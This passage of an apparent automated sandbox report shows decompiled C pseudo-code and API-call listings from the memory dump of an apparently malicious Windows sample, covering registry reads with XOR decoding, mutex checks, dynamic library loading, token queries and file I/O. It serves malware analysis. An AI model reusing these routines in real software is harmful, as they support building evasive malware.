    						__eflags = _t89 - _v24;
    					} while (_t89 < _v24);
    					goto L15;
    				}
    				_t87 =  *0xe6e68c; // 0x510f890
    				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
    				goto L15;
    			}

    APIs
    • memset.MSVCRT ref: 00E561B8
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    • RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 00E56212
    • memset.MSVCRT ref: 00E5627B
    • memset.MSVCRT ref: 00E56288
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: memset$AllocateHeapOpen
    • String ID:
    • API String ID: 2508404634-0
    • Opcode ID: b405a83929654ad06fa638bda250d8dacecd4cd4be3d0cd338c35c00b76c140f
    • Instruction ID: 047178b199e5d8f1a4287fe637aec4ddfa843b078975e474553f3789095c2824
    • Opcode Fuzzy Hash: b405a83929654ad06fa638bda250d8dacecd4cd4be3d0cd338c35c00b76c140f
    • Instruction Fuzzy Hash: 48515971A00209AFDB11DF94DC86EEF7BBCAF04345F105569FA05F7191EB709A088BA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00E59B29(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
    				void* _v8;
    				int _v12;
    				int _v16;
    				void* _v20;
    				int _v24;
    				void* _v28;
    				char _v32;
    				char _v36;
    				int* _v40;
    				int** _v44;
    				void _v108;
    				int* _t90;
    				int _t91;
    				char* _t92;
    				long _t96;
    				int* _t97;
    				intOrPtr _t98;
    				int* _t101;
    				intOrPtr _t110;
    				int* _t111;
    				int* _t112;
    				intOrPtr _t122;
    				char* _t125;
    				intOrPtr _t126;
    				intOrPtr _t128;
    				int* _t129;
    				intOrPtr _t131;
    				int* _t133;
    				intOrPtr _t134;
    				int* _t135;
    				intOrPtr _t136;
    				char* _t139;
    				int _t143;
    				int _t147;
    				intOrPtr _t148;
    				int* _t149;
    				int* _t154;
    				int** _t155;
    				int* _t161;
    				int* _t163;
    				intOrPtr _t164;
    				intOrPtr _t171;
    				int _t176;
    				char* _t177;
    				char* _t178;
    				char _t179;
    				void* _t180;
    				void* _t181;
    				void* _t183;
    
    				_t176 = 0;
    				_v24 = __edx;
    				_t177 = 0;
    				_v32 = __ecx;
    				_v28 = 0;
    				_v8 = 0x80000001;
    				_v20 = 0;
    				_t155 = E00E585EA(0x110);
    				_v44 = _t155;
    				if(_t155 != 0) {
    					_t158 = _a4;
    					_t155[0x42] = _a4;
    					E00E5B5DC(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
    					_t161 = _v108;
    					__eflags = _t161 - 0x61 - 0x19;
    					_t90 = _t161;
    					if(_t161 - 0x61 <= 0x19) {
    						_t90 = _t90 - 0x20;
    						__eflags = _t90;
    					}
    					_v108 = _t90;
    					_t91 = E00E595AD(0x4d2);
    					_t13 =  &_v24; // 0xe55c2d
    					_t163 =  *_t13;
    					_v16 = _t91;
    					__eflags = _t163;
    					if(_t163 == 0) {
    						L16:
    						_t164 =  *0xe6e688; // 0xe80000
    						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
    						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
    							_push(_t176);
    							_push( &_v108);
    							_push("\\");
    							_t92 = E00E59278(_t91);
    							_t181 = _t181 + 0x10;
    							L20:
    							_t177 = _t92;
    							_v20 = _t177;
    							goto L21;
    						}
    						_t51 =  &_v24; // 0xe55c2d
    						_v24 = _t176;
    						_v8 = 0x80000003;
    						_t122 =  *0xe6e68c; // 0x510f890
    						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))), _t51);
    						__eflags = _v24 - _t177;
    						if(_v24 == _t177) {
    							goto L21;
    						}
    						_push(_t176);
    						_push( &_v108);
    						_t125 = "\\";
    						_push(_t125);
    						_push(_v16);
    						_push(_t125);
    						_t59 =  &_v24; // 0xe55c2d
    						_t92 = E00E59278( *_t59);
    						_t181 = _t181 + 0x18;
    						goto L20;
    					} else {
    						_t126 =  *0xe6e688; // 0xe80000
    						_t128 =  *0xe6e68c; // 0x510f890
    						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
    						__eflags = _t129;
    						if(_t129 != 0) {
    							_t91 = _v16;
    							goto L16;
    						}
    						_v12 = _t176;
    						_t131 =  *0xe6e68c; // 0x510f890
    						_t19 =  &_v24; // 0xe55c2d
    						_v8 = 0x80000003;
    						 *((intOrPtr*)(_t131 + 0x20))( *_t19,  &_v12);
    						__eflags = _v12 - _t177;
    						if(_v12 == _t177) {
    							L21:
    							E00E585A8( &_v16);
    							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
    							__eflags = _t96;
    							if(_t96 == 0) {
    								_t97 = _a8;
    								__eflags = _t97;
    								if(_t97 != 0) {
    									 *_t97 = 1;
    								}
    								_push(_v28);
    								L30:
    								_t98 =  *0xe6e68c; // 0x510f890
    								 *((intOrPtr*)(_t98 + 0x1c))();
    								_t155[0x43] = _v8;
    								_t101 = E00E5C384(_t177);
    								 *_t155 = _t101;
    								__eflags = _t101;
    								if(_t101 == 0) {
    									L32:
    									E00E58600( &_v20, 0xffffffff);
    									return _t155;
    								} else {
    									goto L31;
    								}
    								do {
    									L31:
    									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
    									_t176 = _t176 + 1;
    									__eflags = _t176 -  *_t155;
    								} while (_t176 <  *_t155);
    								goto L32;
    							}
    							_v16 = _t176;
    							_t110 =  *0xe6e68c; // 0x510f890
    							_t111 =  *((intOrPtr*)(_t110 + 0x28))(_v8, _t177,  &_v16);
    							__eflags = _t111;
    							if(_t111 == 0) {
    								_t112 = _a8;
    								__eflags = _t112;
    								if(_t112 != 0) {
    									 *_t112 = _t176;
    								}
    								_push(_v16);
    								goto L30;
    							}
    							L23:
    							E00E58600( &_v44, 0x110);
    							memset( &_v108, _t176, 0x40);
    							E00E58600( &_v20, 0xffffffff);
    							goto L1;
    						}
    						_push(_t176);
    						_push(_v16);
    						_t178 = "\\";
    						_push(_t178);
    						_t133 = E00E59278(_v12);
    						_t181 = _t181 + 0x10;
    						_v40 = _t133;
    						__eflags = _t133;
    						if(_t133 == 0) {
    							goto L23;
    						}
    						_t134 =  *0xe6e68c; // 0x510f890
    						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
    						__eflags = _t135;
    						if(_t135 == 0) {
    							_t136 =  *0xe6e68c; // 0x510f890
    							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
    						} else {
    							_t143 = E00E595C7( &_v36, 0x34);
    							_v24 = _t143;
    							_t179 = E00E592CB(_v32);
    							_t31 =  &_v24; // 0xe55c2d
    							_v32 = _t179;
    							E00E585BB(_t31);
    							_t183 = _t181 + 0x18;
    							_t147 = E00E5923C(_v12);
    							_v24 = _t147;
    							_t148 =  *0xe6e68c; // 0x510f890
    							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
    							__eflags = _t149;
    							if(_t149 == 0) {
    								_t154 = _a12;
    								__eflags = _t154;
    								if(_t154 != 0) {
    									 *_t154 = 1;
    								}
    							}
    							E00E58600( &_v32, 0xfffffffe);
    							E00E58600( &_v24, 0xfffffffe);
    							_t181 = _t183 + 0x10;
    							_t178 = "\\";
    						}
    						_t139 = E00E59278(_v12);
    						_t171 =  *0xe6e684; // 0x510f6c8
    						_t181 = _t181 + 0x18;
    						_t177 = _t139;
    						_v20 = _t177;
    						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
    						E00E58600( &_v40, 0xffffffff);
    						goto L21;
    					}
    				}
    				L1:
    				return 0;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID: -\
    • API String ID: 1279760036-177948265
    • Opcode ID: ae9eb4cfbbe876d7f7a9cac02c2acea8e2abedda420cec33fd520f26ab2c01c6
    • Instruction ID: 32e7024b91fb653b3f58ed148905c1ffb8a1e407d41e0dff4c0011b3c2915d29
    • Opcode Fuzzy Hash: ae9eb4cfbbe876d7f7a9cac02c2acea8e2abedda420cec33fd520f26ab2c01c6
    • Instruction Fuzzy Hash: 1F9159B5900209EFDF10DFA5DC459EEBBB8EF04311F105969F915BB262D7709A08CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 48%
    			E00E5E1C7(void* __ecx, void* __edx, intOrPtr _a4) {
    				char _v8;
    				char _t5;
    				struct HINSTANCE__* _t7;
    				void* _t10;
    				void* _t12;
    				void* _t22;
    				void* _t25;
    
    				_push(__ecx);
    				_t12 = __ecx;
    				_t22 = __edx;
    				_t5 = E00E595AD(_a4);
    				_t25 = 0;
    				_v8 = _t5;
    				_push(_t5);
    				if(_a4 != 0x7c3) {
    					_t7 = LoadLibraryA(); // executed
    				} else {
    					_t7 = GetModuleHandleA();
    				}
    				if(_t7 != 0) {
    					_t10 = E00E5E17C(_t12, _t22, _t7); // executed
    					_t25 = _t10;
    				}
    				_t4 =  &_v8; // 0xe5604a
    				E00E585A8(_t4);
    				return _t25;
    			}











    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,00E6BA20), ref: 00E5E1E9
    • LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,00E6BA20), ref: 00E5E1F6
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: HandleLibraryLoadModule
    • String ID: J`
    • API String ID: 4133054770-2608114221
    • Opcode ID: c7b024ec9d29f04477f3b184faeb47686933a0c84e3f0b9139cf9f115444862d
    • Instruction ID: c4296dd63bdf3abe848b0e111fcb6b3fce87223b347e41fffabb12856fec40f7
    • Opcode Fuzzy Hash: c7b024ec9d29f04477f3b184faeb47686933a0c84e3f0b9139cf9f115444862d
    • Instruction Fuzzy Hash: 23F0AE317011149BD7086B6DED8589FB7DC9F947967105429F806F7351DDB09E4887F0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00E5B97E(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
    				long _v8;
    				void* _v12;
    				void* _t12;
    				void* _t20;
    				void* _t22;
    				union _TOKEN_INFORMATION_CLASS _t28;
    				void* _t31;
    
    				_push(_t22);
    				_push(_t22);
    				_t31 = 0;
    				_t28 = __edx;
    				_t20 = _t22;
    				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L6:
    					_t12 = _t31;
    				} else {
    					_t31 = E00E585EA(_v8);
    					_v12 = _t31;
    					if(_t31 != 0) {
    						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
    							goto L6;
    						} else {
    							E00E58600( &_v12, _t16);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t12 = 0;
    					}
    				}
    				return _t12;
    			}











    APIs
    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B999
    • GetLastError.KERNEL32(?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B9A0
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B9CF
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: InformationToken$AllocateErrorHeapLast
    • String ID:
    • API String ID: 2499131667-0
    • Opcode ID: 100a845c7dae8c3c4046c4bbcbdbfc83319b8bd0ef4d48fccb9cbb25800a79e2
    • Instruction ID: 6c780fe1d2cfac424566bbc85ca30abf7be67c071883c2dfd79a6ee63ee9c8fc
    • Opcode Fuzzy Hash: 100a845c7dae8c3c4046c4bbcbdbfc83319b8bd0ef4d48fccb9cbb25800a79e2
    • Instruction Fuzzy Hash: 2F01A772600114BF8B205BA5DC49D9F7FACDF857A67105955FA05F6210E770DD0887A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00E558F4(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
    				intOrPtr _t10;
    				void* _t13;
    				void* _t19;
    				signed int _t21;
    				signed int _t22;
    
    				_t13 = __edx;
    				if(__ecx != 0) {
    					_t22 = 0;
    					_t19 = CreateMutexA(0, 1, __ecx);
    					if(_t19 != 0) {
    						if(GetLastError() != 0xb7 || E00E5A4A5(_t19, _t13) != 0xffffffff) {
    							_t22 = 1;
    							 *_a4 = _t19;
    						} else {
    							_t10 =  *0xe6e684; // 0x510f6c8
    							 *((intOrPtr*)(_t10 + 0x30))(_t19);
    						}
    					} else {
    						GetLastError();
    						_t22 = 0xffffffff;
    					}
    				} else {
    					_t22 = _t21 | 0xffffffff;
    				}
    				return _t22;
    			}









    APIs
    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,00E559B5,00E55DBC,Global,00E6BA10,?,00000000,?,00000002), ref: 00E55910
    • GetLastError.KERNEL32(?,?,00E559B5,00E55DBC,Global,00E6BA10,?,00000000,?,00000002), ref: 00E5591C
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CreateErrorLastMutex
    • String ID:
    • API String ID: 1925916568-0
    • Opcode ID: c23569b18c089e7bd7e78cd9ce01a2b4950b5f139f9468dfdf0ca0d904ea331e
    • Instruction ID: c773d07f2f56b812440dd089e60bac3b0cc98e2473873043eadc3e4029b90dac
    • Opcode Fuzzy Hash: c23569b18c089e7bd7e78cd9ce01a2b4950b5f139f9468dfdf0ca0d904ea331e
    • Instruction Fuzzy Hash: 16F0F432200510CBDB100B5AE858A7B76A8EFD6376B111B21FD79E72D0CBB48C0D42A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00E5595C(void* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				char _v12;
    				char _v52;
    				intOrPtr _t16;
    				void* _t19;
    				intOrPtr _t27;
    				void* _t42;
    
    				_t42 = __edx;
    				_v8 = 0;
    				E00E5A853( &_v52, __ecx, __eflags);
    				_t16 =  *0xe6e688; // 0xe80000
    				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
    					L1:
    					_t27 =  *0xe6e684; // 0x510f6c8
    					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
    					goto L1;
    				}
    				_push(0);
    				_push( &_v52);
    				_push("\\");
    				_v12 = E00E59278("Global");
    				_t19 = E00E558F4(_t18, _t42,  &_v8); // executed
    				__eflags = _t19 - 1;
    				if(_t19 == 1) {
    					FindCloseChangeNotification(_v8);
    					_v8 = 0;
    					E00E558F4( &_v52, _t42,  &_v8); // executed
    				}
    				E00E58600( &_v12, 0xffffffff);
    				return _v8;
    			}











    APIs
    • FindCloseChangeNotification.KERNELBASE(00E55DBC,?,?,?,?,00000002), ref: 00E559C5
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID: Global
    • API String ID: 2591292051-4020866741
    • Opcode ID: 12481b30765af1801dc55efe0164fc4135110293b20458706f166713140ec105
    • Instruction ID: 636375fa918944c71d37de5cb148279a0b40757e33b767c06ce6563802dfa792
    • Opcode Fuzzy Hash: 12481b30765af1801dc55efe0164fc4135110293b20458706f166713140ec105
    • Instruction Fuzzy Hash: B8115E76904108EFCB04EB99E945CDEB7F8EB94311B201566F815F7291DA709A09C651
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 26%
    			E00E5A68F(void* __ecx, signed int _a4, intOrPtr* _a8) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _t26;
    				intOrPtr _t27;
    				intOrPtr _t29;
    				intOrPtr* _t39;
    				void* _t47;
    				intOrPtr _t55;
    				intOrPtr _t58;
    				char _t60;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t50 = _a4;
    				_t60 = 0;
    				_v12 = 0;
    				if(_a4 != 0) {
    					_t47 = E00E5A621(_t50);
    					if(_t47 == 0) {
    						L11:
    						_t26 = 0;
    						L12:
    						L13:
    						return _t26;
    					}
    					_t27 =  *0xe6e684; // 0x510f6c8
    					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
    					if(_t58 == 0) {
    						L9:
    						_t29 =  *0xe6e684; // 0x510f6c8
    						 *((intOrPtr*)(_t29 + 0x30))(_t47);
    						if(_t60 != 0) {
    							E00E58600( &_v12, 0);
    						}
    						goto L11;
    					}
    					_t4 = _t58 + 1; // 0x1
    					_t60 = E00E585EA(_t4);
    					_v12 = _t60;
    					if(_t60 == 0) {
    						goto L9;
    					}
    					_a4 = _a4 & 0;
    					_push(0);
    					_v8 = 0;
    					_push( &_a4);
    					_push(_t58);
    					_push(_t60);
    					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
    						if(_a4 == 0) {
    							if(_v8 != _t58) {
    								goto L9;
    							}
    							_t39 = _a8;
    							 *((char*)(_t58 + _t60)) = 0;
    							if(_t39 != 0) {
    								 *_t39 = _t58;
    							}
    							FindCloseChangeNotification(_t47);
    							_t26 = _t60;
    							goto L12;
    						}
    						_t55 = _v8 + _a4;
    						_a4 = _a4 & 0x00000000;
    						_push(0);
    						_push( &_a4);
    						_v8 = _t55;
    						_push(_t58 - _t55);
    						_push(_t55 + _t60);
    					}
    					goto L9;
    				}
    				_t26 = 0;
    				goto L13;
    			}














    APIs
    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00E5FA61,00000000,00E5F8C0,00E7EFE0,00E6B988,00000000,00E6B988,00000000,00000000,00000615), ref: 00E5A719
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00E5FA61,00000000,00E5F8C0,00E7EFE0,00E6B988,00000000,00E6B988,00000000,00000000,00000615,0000034A,00000000,0510FB08,00000400), ref: 00E5A75C
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: ChangeCloseFileFindNotificationRead
    • String ID:
    • API String ID: 1200561807-0
    • Opcode ID: 8a87b561defd2131de8961babf5473d1792a03d643be7297579852ab61ab0a79
    • Instruction ID: 6def4dcc92944eb161f3228ad3b8d025c01a3a76a090216767f8914f56cf0c58
    • Opcode Fuzzy Hash: 8a87b561defd2131de8961babf5473d1792a03d643be7297579852ab61ab0a79
    • Instruction Fuzzy Hash: 02217C75600205AFDB10CF64C884BAA77FCEF08355F28596AFD05EB241E7B0D94887A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00E55CD4() {
    				void _v44;
    				signed int _t8;
    				intOrPtr _t14;
    				intOrPtr _t15;
    				void* _t22;
    				void* _t33;
    
    				_t8 =  *0xe6e688; // 0xe80000
    				E00E624A6(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
    				E00E585D5();
    				E00E58F5E();
    				 *0xe6e780 = 0;
    				 *0xe6e784 = 0;
    				 *0xe6e77c = 0;
    				E00E55E9E(); // executed
    				E00E5CF8F(_t22);
    				_t14 =  *0xe6e688; // 0xe80000
    				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
    				_t15 =  *0xe6e688; // 0xe80000
    				E00E5A853( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7,  *((intOrPtr*)(_t15 + 0xac)) + 7);
    				E00E5B31D( &_v44);
    				memset( &_v44, 0, 0x27);
    				E00E55C0E( &_v44, _t33);
    				ExitProcess(0);
    			}










    APIs
      • Part of subcall function 00E585D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,00E55F84), ref: 00E585DE
      • Part of subcall function 00E5CF8F: GetCurrentProcess.KERNEL32(?,?,00E80000,?,00E5353A), ref: 00E5CF9B
      • Part of subcall function 00E5CF8F: GetModuleFileNameW.KERNEL32(00000000,00E81644,00000105,?,?,00E80000,?,00E5353A), ref: 00E5CFBC
      • Part of subcall function 00E5CF8F: memset.MSVCRT ref: 00E5CFED
      • Part of subcall function 00E5CF8F: GetVersionExA.KERNEL32(00E80000,00E80000,?,00E5353A), ref: 00E5CFF8
      • Part of subcall function 00E5CF8F: GetCurrentProcessId.KERNEL32(?,00E5353A), ref: 00E5CFFE
      • Part of subcall function 00E5B31D: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00E53C8B,?,?,?,?,?,?,?,?,00E53D70,00000000), ref: 00E5B350
    • memset.MSVCRT ref: 00E55D47
    • ExitProcess.KERNEL32(00000000,?,?,?), ref: 00E55D5A
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: Process$Currentmemset$ChangeCloseCreateExitFileFindHeapModuleNameNotificationVersion
    • String ID:
    • API String ID: 2253208953-0
    • Opcode ID: 2c8111a6ea0e59319d66e38611a5562695ff825faef628297cb76fd03b03529d
    • Instruction ID: cd59e9ec74d897875f0e05e60d4e1501a5094cae1901655083ec22df4fe2fa18
    • Opcode Fuzzy Hash: 2c8111a6ea0e59319d66e38611a5562695ff825faef628297cb76fd03b03529d
    • Instruction Fuzzy Hash: 90014B755012149FD600FBA9E85AE8F3BE8EF18361F451465F904B7262DBB065098BA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00E5A642(void* __ecx, void* __edx, intOrPtr _a4) {
    				long _v8;
    				void* _v12;
    				void* _t13;
    				void* _t21;
    				void* _t23;
    				void* _t26;
    
    				_t23 = __ecx;
    				_push(__ecx);
    				_push(__ecx);
    				_t26 = 0;
    				_v12 = __ecx;
    				_t21 = __edx;
    				if(_a4 == 0) {
    					L3:
    					_t13 = 1;
    				} else {
    					while(1) {
    						_v8 = _v8 & 0x00000000;
    						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
    							break;
    						}
    						_t26 = _t26 + _v8;
    						_t23 = _v12;
    						if(_t26 < _a4) {
    							continue;
    						} else {
    							goto L3;
    						}
    						goto L4;
    					}
    					_t13 = 0;
    				}
    				L4:
    				return _t13;
    			}










    APIs
    • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E58F37,?), ref: 00E5A66F
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: FileWrite
    • String ID:
    • API String ID: 3934441357-0
    • Opcode ID: 984df2ead62b075ac816e62ee5ff31a15eb23a4d1c2526683fe67d27f65da3a9
    • Instruction ID: d6ecf4985e48f3eb7701374b7dd1f506d8b3e3a6446a60e7daa4efa35c271161
    • Opcode Fuzzy Hash: 984df2ead62b075ac816e62ee5ff31a15eb23a4d1c2526683fe67d27f65da3a9
    • Instruction Fuzzy Hash: 8DF0F972A10119BFDB10DF98C988AEAB7ECEB04745F194569A909E7140D6B0AE4487A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00E58600(char _a4, intOrPtr _a8) {
    				char _t3;
    				intOrPtr _t4;
    				void* _t9;
    
    				_t3 = _a4;
    				if(_t3 == 0) {
    					return _t3;
    				}
    				_t9 =  *_t3;
    				if(_t9 != 0) {
    					 *_t3 =  *_t3 & 0x00000000;
    					_t4 = _a8;
    					if(_t4 != 0xffffffff) {
    						if(_t4 == 0xfffffffe) {
    							_t4 = E00E5C39D(_t9);
    						}
    					} else {
    						_t4 = E00E5C384(_t9);
    					}
    					E00E58735(_t9, 0, _t4);
    					_t3 = RtlFreeHeap( *0xe6e768, 0, _t9); // executed
    				}
    				return _t3;
    			}







    APIs
    • RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: b98f5dbfb87f784ecb6bb2a06bafbae65ba661fe07296e1f39791b71436e54f6
    • Instruction ID: 4aeb033475177d6733ec7199c048649d0ab8753658979056536ac841387dfeeb
    • Opcode Fuzzy Hash: b98f5dbfb87f784ecb6bb2a06bafbae65ba661fe07296e1f39791b71436e54f6
    • Instruction Fuzzy Hash: B6F0E5315022146FDB202A24AD51FAE33988F11BB7F242A41FD18BB2E0DFB0AC1C86D5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00E5A5DD(WCHAR* __ecx, long __edx) {
    				intOrPtr _t6;
    				long _t12;
    				void* _t13;
    
    				_t12 = __edx;
    				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
    				if(_t13 != 0xffffffff) {
    					if(_t12 == 4) {
    						_t6 =  *0xe6e684; // 0x510f6c8
    						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
    					}
    					return _t13;
    				}
    				return 0;
    			}







    APIs
    • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00E58F1F), ref: 00E5A5F8
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: e76c212e8b9112c5ceb4ec93c6d09a97db52fd143de0ed5c050212e5f049213f
    • Instruction ID: 09f448c39ed9cd0151b87cf43f3725da62fcc8cacdffa8e381b9b4fed93a8210
    • Opcode Fuzzy Hash: e76c212e8b9112c5ceb4ec93c6d09a97db52fd143de0ed5c050212e5f049213f
    • Instruction Fuzzy Hash: 5BE092B63000147FE6201669ACC8F6B265CE7957FAF090730FA11E31D0C1908C094671
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00E5A763(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				signed int _t5;
    				void* _t6;
    				void* _t10;
    				void* _t15;
    				void* _t17;
    
    				_t15 = 2;
    				_t5 = E00E5A5DD(_a4, _t15);
    				_t17 = _t5;
    				if(_t17 != 0) {
    					_t6 = E00E5A642(_t17, _a8, _a12); // executed
    					if(_t6 != 0) {
    						FindCloseChangeNotification(_t17);
    						return 0;
    					}
    					_t10 = 0xfffffffe;
    					return _t10;
    				}
    				return _t5 | 0xffffffff;
    			}









    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 310e57af23a36e417c677b884fb13ed121f0ea399522d3c0d190c85ac134353c
    • Instruction ID: 26f84279c7c34758f4435e3cd4e21599d2b894efc4cbac5d0a9f368e159d718c
    • Opcode Fuzzy Hash: 310e57af23a36e417c677b884fb13ed121f0ea399522d3c0d190c85ac134353c
    • Instruction Fuzzy Hash: 12E068362042256FCB225B389C40CAE33A89F0C3757245F33FC36AB2C1EA30C80442D2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00E5B31D(void* __ecx) {
    				intOrPtr _t4;
    				void* _t5;
    				intOrPtr _t6;
    				void* _t12;
    				void* _t13;
    
    				_t4 =  *0xe6e684; // 0x510f6c8
    				_t13 = 0;
    				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
    				_t12 = _t5;
    				if(_t12 != 0) {
    					_t6 =  *0xe6e684; // 0x510f6c8
    					_push(_t12);
    					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
    						_t13 = 1;
    					}
    					FindCloseChangeNotification(_t12);
    					return _t13;
    				}
    				return _t5;
    			}









    APIs
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00E53C8B,?,?,?,?,?,?,?,?,00E53D70,00000000), ref: 00E5B350
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID:
    • API String ID: 2591292051-0
    • Opcode ID: ae8541adf15ae096ff54eadaa3ce39d5d0b249ccc707b1a7edcb2830aba6e89c
    • Instruction ID: 6b6a5f1050afbbc25bf94cdea4ef4249cf6b58ac154a2e1365375e950116e24e
    • Opcode Fuzzy Hash: ae8541adf15ae096ff54eadaa3ce39d5d0b249ccc707b1a7edcb2830aba6e89c
    • Instruction Fuzzy Hash: 86E04F363001209FC6204B6AFC4CF6B7B6DEB95AA1B060168F909E7291CBA08806C7F1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00E5A621(WCHAR* __ecx) {
    				signed int _t5;
    
